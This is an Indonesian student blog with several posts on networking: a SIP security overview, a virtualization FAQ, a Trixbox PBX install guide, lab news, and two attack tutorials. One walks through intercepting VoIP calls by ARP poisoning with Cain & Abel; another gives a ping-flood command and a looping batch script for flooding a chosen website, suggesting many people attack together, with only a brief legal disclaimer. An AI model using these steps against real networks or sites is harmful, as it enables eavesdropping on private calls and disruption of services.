Selasa, 04 Februari 2014

Menyadap komunikasi VoIP menggunakan Cain & Abel

Karena bentuk data VoIP berupa paket, maka pada dasarnya bila kita bisa men-capture paket tersebut, maka kita bisa menyadap pembicaraan yang berlangsung. Bahasa keren nya sih sniffing hehe. Hanya dengan menggunakan tools seadanya yang kita unduh di internet, kita bisa dengan mudah menyadap percakapan yang berlangsung,  tools yang dipake banyak variasinya, diantaranya wireshark, cain & abel, tcpdump, ettercap, kismet, netStumbler, enGrep, kisMAC dan masih banyak lagi tools lainnya. Pada kesempatan ini saya akan menggunakan Cain & Abel untuk menyadap pembicaraan VoIP. Sebetulnya lebih mudah menggunakan wireshark, namun entah kenapa saya gagal ketika menjalankan menggunakan wireshark, jadi saya menggunakan cain & abel saja..hehe

  • Pertama, jalankan sniffer mode pada cain & abel, setelah itu masuk ke tab sniffer
  • Setelah masuk ke tab sniffer, kita harus melakukan scanning terlebih dahulu terhadap jaringan yang kita pakai, pada jendela dibawah ini kita diberi pilihan untuk melakukan scaning terhadap semua IP yang ada di subnet kita, atau men scan sesuai dengan range yang kita tentukan. selain itu kita juga diberikan pilihan untuk melakukan tes / injeksi apa terhadap host yang di scan, untuk mengetahui vurnerabilitynya, kalo saran saya sih pilih opsi all test saja.



  •   Setelah itu akan muncul list host yang telah ter scan, berupa alamat IP dan MAC addressnya
  •  Setelah terscan, kita masuk ke tab APR, untuk melakukan ARP poisoning. klik simbol + pada toolbar untuk menambahkan host target.
 
  •  Pilih host yang menjadi target,yaitu IP user agent server dan user agent client


  •  Setelah memilih host, akan muncul tampilan seperti dibawah ini yang menunjukan IP host yang menjadi target
  • Aktifkan ARP poisoning
  • Setelah host teracuni, lakukan komunikasi VoIP. dan pindahkan pada tab VoIP untuk melihat  hasil rekaman penyadapan.

  • untuk mendengarkan hasil sniffing, tinggal klik kanan dan pilih play


selamat mencoba, semoga bermanfaat ...

Senin, 03 Februari 2014

welcome to the big family of switching technique laboratory :)

Alhamdulilah rekruitasi untuk asisten baru udah selesai. horeeeee..
lega rasanya, karena memang tenaga dan pikiran terkuras habis saat proses rekruitasi ini.
tiap rapat pasti aja ada debat, bete, marah, kesel, cape, semua campur aduk saat bikin skenario rekruitasi. haha seru juga sih sebenernya
semoga rekruitasinya bermanfaat ya buat asisten baru, selamat buat kalian geo, bah, ridwansyah, vikry, sam, aldo, diaz, abdi, boka, eca, alif, devy
jangan siasiakan kepercayaan kita ya, jaga nama baik lab switching.
selalu ingat slogan lab kita, " we are big because of togetherness" 



Parameter Keamanan SIP

SIP (Session Initiation Protocol) merupakan protokol pensinyalan berbasis IP yang bekerja pada layer aplikasi, protokol ini memiliki beberapa parameter keamanan SIP diantaranya :
  • Akses Kontrol
Berkaitan dengan cara pengaturan akses kepada informasi, untuk melindung dari penggunaan sumber daya jaringan yang tidak sah. Akses kontrol memastikan bahwa hanya user yang berhak yang diijinkan yang diperbolehkan untuk mengakses jaringan maupun mengambil informasi.
  • Autentikasi
Berkaitan dengan cara untuk memastikan identitas yang berpartisipasi dalam komunikasi (seperti user atau perangkat) dan menjamin bahwa tidak ada pihak-pihak yang melakukan penyamaran yang tidak sah.
  • Non-repudiation
Berkaitan dengan menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah aktivitas yang berhubungan dengan komunikasi. Hal ini untuk membuktikan bahwa beberapa aktivitas atau tindakan telah berlangsung.
  • Kerahasiaan Data
Berkaitan dengan perlindungan data dari penyingkapan oleh pihak  yang tidak berwenang. Aspek ini memastikan bahwa isi data tidak bisa dipahami atau disadap oleh pihak yang tidak sah. Enkripsi, daftar akses kontrol dan ijin file adalah metoda yang sering digunakan untuk menyediakan aspek ini.
  • Keamanan Komunikasi
Berfungsi untuk memastikan bahwa informasi mengalir hanya antara titik akhir yang diberi hak, informasi tidak dialihkan atau diinterupsi ketika informasi mengalir antar pihak yang berhak.
  • Integritas Data
Berkaitan dengan keutuhan sebuah data. Data harus utuh dan tidak boleh diubah  tanpa seijin pemilik informasi. Informasi harus terlindungi dari modifikasi yang tidak sah, penghapusan, pengalihan, maupun perubahan lainnya.
  • Availability
Berkaitan dengan ketersediaan informasi ketika dibutuhkan. Sistem informasi server yang diserang dapat menghambat akses ke informasi. Contohnya, hambatan serangan yang sering disebut dengan DoS, dimana server dikirimi permintaan (biasanya palsu) yang sangat banyak atau permintaan yang diluar perkiraan,  sehingga server tidak dapat melayani permintaan yang sebenarnya atau bahkan sampai down.
  • Privacy
Berkaitan dengan perlindungan terhadap data-data sensitif yang bersifat privat, misalnya data IP address, jenis operating system yang digunakan dan lain-lain.

Kamis, 30 Januari 2014

All about the virtualization

Sedikit tertarik untuk mengulas tentang virtualisasi di blog saya, kebetulan tugas akhir saya tentang Cloud Computing yang otomatis sangat erat kaitan nya dengan virtualisasi. jadi pada kesempatan kali ini saya akan bahas mengenai virtualisasi..

1. Sebenernya virtualisasi tuh apa sih? 
Dalam dunia komputer, virtualisasi merupakan suatu cara membuat sistem komputer / resources komputer menjadi abstraksi. resource komputer dalam hal ini diantaranya motherboard,ram,hardisk dll dibuat dalam bentuk virtual dengan pola akses remote, gampangnya sih jika sebuah CPU divirtualisasikan, maka CPU tersebut bisa saja hanya jadi sebuah OS saja atau sebuah aplikasi saja.
contoh softwarenya : VMware, Xen, Citrix, KVM, virtual-box, Solaris Zones.
2. Teknik virtualisasinya bagaimana? 
Ada 2 cara, yang pertama paravirtualization dan yang kedua full virtualization & hardware assisted virtualization
3.  Bedanya host OS dan guest OS? 
Dalam konsep virtualisasi, ada yang namanya OS dalam OS. Contohnya misalkan saya mempunyai OS windows, dalam OS windows ini saya install Ubuntu menggunakan Vbox. Dalam kasus ini, OS windows saya merupakan host OS, sedangkan ubuntu merupakan guest OS.
4.  Apasih full virtualization itu?
Full virtualization artinya kita membuat virtualisasi dari mulai level hardwarenya, dari mulai motherboard, NIC, VGA, RAM, HDD, USB controller, soundcard dan hardware lainnya yang berbentuk virtual, sama saja seperti kita membeli CPU baru, hanya saja dalam bentuk virtual.
5.  Kalo Hardware Assisted Virtualization itu apa ya?
Hardware assisted virtualization merupakan virtualisasi yang didukung dari sisi hardware-nya jadi ada sebuah hardware khusus yang dibuat untuk mendukung proses virtualisasi, biasanya sih hardware tersebut ditanam di CPU serta menjadi sebuah feature CPU. untuk processor intel nama featurenya INTEL-VT untuk AMD namanya AMD-V. Jadi CPU anda tidak akan nge-lag lagi saat menjalankan mesin virtual karena didukung oleh hardware ini. hanya saja mau sebagus apapun, guest OS tidak akan berjalan semulus host OS.
6. Gimana sih cara ngecek kalo CPU kita sudah support virtualisasi? 
untuk mengecek PC kita sudah support virtualisasi atau tidak, kita bisa menggunakan aplikasi securable. Jika menggunakan linux, bisa dengan command: cat /proc/cpuinfo, trus lihat feature CPU yang ada disana.
7. Apasih paravirtualization itu?
ini artinya virtualization di level kernel OS, jadi ngak bikin emulasi hardware, mulainya dari kernel. kernel itu kan modal awal dan utama untuk nge-nyalain OS tuh. nah, kernel ini di modifikasi sehingga bisa bikin instance kernel lagi agar dapat dipake oleh OS yang baru.
8. Kalo ngejalanin aplikasi windows diatas linux, itu virtualisasi bukan sih?
Nah kalo ini namanya emulator, untuk menjalanjkan aplikasi berbasis windows di OS linux biasanya menggunakan tools winecrossover dll
9.   Hypervisor, itu apaan sih?
Hypervisor secara sederhana adalah aplikasi untuk menjalankan virtualisasi, untuk membuat guest OS bisa berjalan didalam host OS. contoh aplikasinya yaitu : Xen, Vbox, vmware, citrix dll
10.  Hypervisor ada berapa macam sih?
hypervisor ada 2 macam :
  • Bare metal / Native hypervisor
  •  Hosted Hypervisor
11. Native Hypervisor apaan sih?
Native Hypervisor merupakan hypervisor yang diinstal seperti OS dalam sebuah CPU. namun OS hypervisor ini beda dengan OS biasa seperti linux, windows, solaris dll. OS ini khusus untuk membuat virtualisasi. untuk me-remote OS ini juga harus menggunakan software khusus. Contohnya yaitu Vsphere, Vmware esXi,Proxmox VE
12.  nah, kalo Hosted Hypervisor?
Kalo hosted hypervisor, ini artinya kita menginstal satu hypervisor dalam hypervisor lainnya. Atau dengan kata lain kita menginstall OS dalam OS. Contoh software nya yaitu VMware, Vbox, Citrix , Microsoft Hyper-V
13. kalo VPS ( virtual private server ) apa sih?
VPS adalah sebuah server yang dibagi menjadi beberapa VM (Virtual Machines), dimana di setiap VM adalah berupa “Virtual server” yang dapat di install OS tersendiri. VPS terasa seperti sebuah dedicated Server.

Terimakasih sudah membaca, semoga bermanfaat ...

sumber : http://achmad.glclearningcenter.com/tag/para-virtualization/ , sama om google.com
 
 

Kamis, 21 November 2013

Rekruitasi asisten praktikum laboratorium teknik switching IT Telkom

ga kerasa, udah hampir setaun saya menghuni lab ini. sekarang uda rekruitasi lagi aja..
semoga adik adik yang daftar nanti cantik cantik haha

Rabu, 20 November 2013

cara melakukan serangan DDOS dengan command prompt

sebelum saya menjelaskan membuat serangan DDOS dengan cmd, saya akan menjelaskan dulu apa itu DOS, apa itu DDOS.

DoS attack: Denial of Service attack
Serangan ini melibatkan satu komputer / koneksi internet untuk (membanjiri) sebuah server dengan paket ICMP/TCP/UDP,tujuan dari serangan ini adalah untuk membuat bandwith server menjadi overload, sehingga server tidak bisa lagi menangani trafik yang masuk dan server akhirnya down.

DDoS attack: Distributed Denial of Service attack
DDoS attack hampir sama dengan Dos tetapi perbedaan dari hasil yang disebabkan olehnya sangat berbeda. Serangan DDoS dijalankan menggunakan metode computer yang terdistribusi yang sering disebut dengan 'botnet army', atau biasa juga dikenali dengan komputer "zombie". Proses nya dengan cara menginfeksi komputer lain dengan malware yang memberikan akses bagi botnet owner kepada komputer yang terinfeksi. Hal ini bisa berarti, bootnet owner bisa menggunakan resource apa saja dari komputer korban dan menggunakan koneksi komputer tersebut untuk membanjiri (flood) target yang akan diserang. Server yang diserang akan lumpuh sangat cepat karena beberapa koneksi digunakan untuk melawan satu koneksi. Bayangkan ini seperti perkelahian. jika 1 lawan 1 maka kemungkinan menangnya 50:50, tapi jika 1000 lawan 1 ? matilah kita.

Sebetulnya banyak software untuk men-generate serangan DOS, tapi kali ini saya akan mencoba men-generate serangan DOS melalui cmd windows.

cara yang pertama :
ketikan command berikut pada cmd :
1. Buka CMD 
2. ketik "ping <ip add>  -l 50000 -n 5000 -w 0.00001"
  •  <ip add> = IP Address situs yang akan di DDoS (bisa diganti dengan alamat situsnya)
  • -l 50000 = besar ping yang dikirim server sebesar 50000 bytes (bisa diganti maksimal 65500 bytes)
  • -n 5000 = ukuran buffer yang dikirim 5000 bytes (bisa diganti sesuka hati)
  • -w 0.00001 = waktu tunggu tiap ping 0.00001 milidetik (bisa diganti sesuka hati)
3. Tekan enter dan tunggu hingga anda mendapatkan pesan "Request timed out"
 
cara yang kedua : 
1. Buka Notepad (accesoris -> notepad)

2. tulis script dibawah ini 
@echo off

mode 67,16
title DDOS Attack By http://johangifari.blogspot.com/
color 0b
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile By http://johangifari.blogspot.com/
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0d
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

 3. Kemudian Save Menggunakan Extensi .Bat (contohDDoS.bat)

4. setelah itu buka file yang telah kita buat tadi 

5. Server-target isikan dengan nama domain / nama situs yang akan kita DDOS. misal : www.google.com

6. Setelah kita isikan server-target maka akan muncul alamat ip target, lalu pada ip host isikan ip address target kita

7. Lalu akan ada packet size, isikan terserah anda.
misalkan 1000000000 

8. Setelah itu tekan enter maka proses DDOS akan berjalan, DDOS membutuhkan waktu yang lumayan lama tergantung kemampuan situs yang kita DDOS. Akan lebih baik kalau kita melakukan DDOS secara serentak atau dengan banyak orang.

mudah kan? hehe
tapi ingat, ini hanya untuk sekedar pengetahuan saja. jangan dicoba ke website orang lain ya, apalagi website resmi. karena serangan semacam ini cukup untuk membuat kita hidup dibalik jeruji besi ! haha
jika anda ingin mencoba serangan DDOS ini, maka cobalah pada sistem yang anda buat sendiri, agar tidak menimbulkan kerugian untuk orang lain
semoga bermanfaat ..

tutorial Install dan setting klien Trixbox 2.8

Pada kesempatan kali ini saya akan share mengenai trixbox, apa sih trixbox itu?
Trixbox merupakan salah satu contoh dari freepbx, pbx (private branch exchange) merupakan sentral telepon mini yang biasanya dipakai di perkantoran atau sekolah untuk keperluan komunikasi. Trixbox merupakan suatu platform, gabungan dari Asterisk, freepbx dan mysql. asterisk disini berfungsi sebagai softswitch-nya, freepbx sebagai tampilan web interface-nya,mysql sebagai database servernya dan CentOs sebagai Operating sistemnya, ketiga unsur pembentuk trixbox ini di bundle menjadi satu dan membentuk sebuah OS. Jadi dengan kata lain, trixbox hampir sama dengan OS, jika kita menginstall trixbox dalam suatu PC, maka OS lain yang ada dalam PC kita akan tertimpa oleh trixbox.
Sebelum kita menginstal Trixbox, download dulu file ISO nya di sini , lalu setelah itu mulai langkah instalasi.
1. Pilih boot device kita gunakan untuk install trixbox, bisa berupa USB atau CD.
2. Setelah itu akan muncul tampilan trixbox seperti ini 
3. Tekan enter untuk melanjutkan, setelah itu anda diminta untuk memilih setting default keyboard
4. klik OK, lalu anda diminta untuk memilih setting time zone, pilih Asia/jakarta

5. Klik Ok untuk melanjutkan, lalu isikan password yang ingin anda pakai

 6. klik OK, tunggu sampai system berhasil diformat dan instalasi akan dimulai secara otomatis

7. Setelah proses instalasi selesai, akan muncul layar seperti berikut 
8. tunggu sampai instalasi selesai, maka akan muncul layar berikut, masukan username root dan password sesuai yang kita isikan di langkah sebelumnya
9. selanjutnya setting IP address, ketik # netconfig maka akan muncul layar berikut 
 10. pilih yes, jika kita terhubung ke server DHCP, maka ceklis pilihan use dynamic IP configuration (BOOTP/DHCP) . tetapi jika kita ingin men setting IP kita secara manual, maka kita harus mengisikan
  • IP Adress  :  xxx.xxx.xxx.xxx
  • Netmask :   xxx.xxx.xxx.xxx
  • Default Gw : xxx.xxx.xxx.xxx
  • Primary Name server : xxx.xxx.xxx.xxx
Sampai tahap ini proses instalasi telah selesai, langkah selanjutnya yaitu mendaftarkan klien pada trixbox. 
1. Ketikan pada browser alamat IP trixbox kita, misal http://10.11.225.221 (intranet)
2. maka akan muncul tampilan trixbox seperti dibawah ini 
3. klik "maint" pada sudut kanan atas, sampai muncul kotak dialog seperti dibawah ini, masukan username : maint , dan password : password

4. setelah masuk ke home screen trixbox, pilih menu pbx -> pbx setting

 5. pilih menu extensions, pilih generic SIP device, lalu submit
 6. isikan field user extension, display name dan secret. secret merupakan password yang akan kita gunakan pada softphone untuk mendaftarkan klien . klik submit -> apply configuration changes

 7. jika extension yang anda daftarkan muncul di list extension sebelah kanan layar, maka pendaftaran berhasil dilakukan. 
8. setelah mendaftarkan klien di server, selanjutnya kita harus mendaftarkan klien di softphone. password merupakan secret yang kita isikan pada config server, domain merupakan IP alamat server, pada kasus ini yaitu 10.11.225.221

 9. Daftarkan klien dri softphon, klik ok 
10. Anda siap berkomunikasi menggunakan Trixbox sebagai server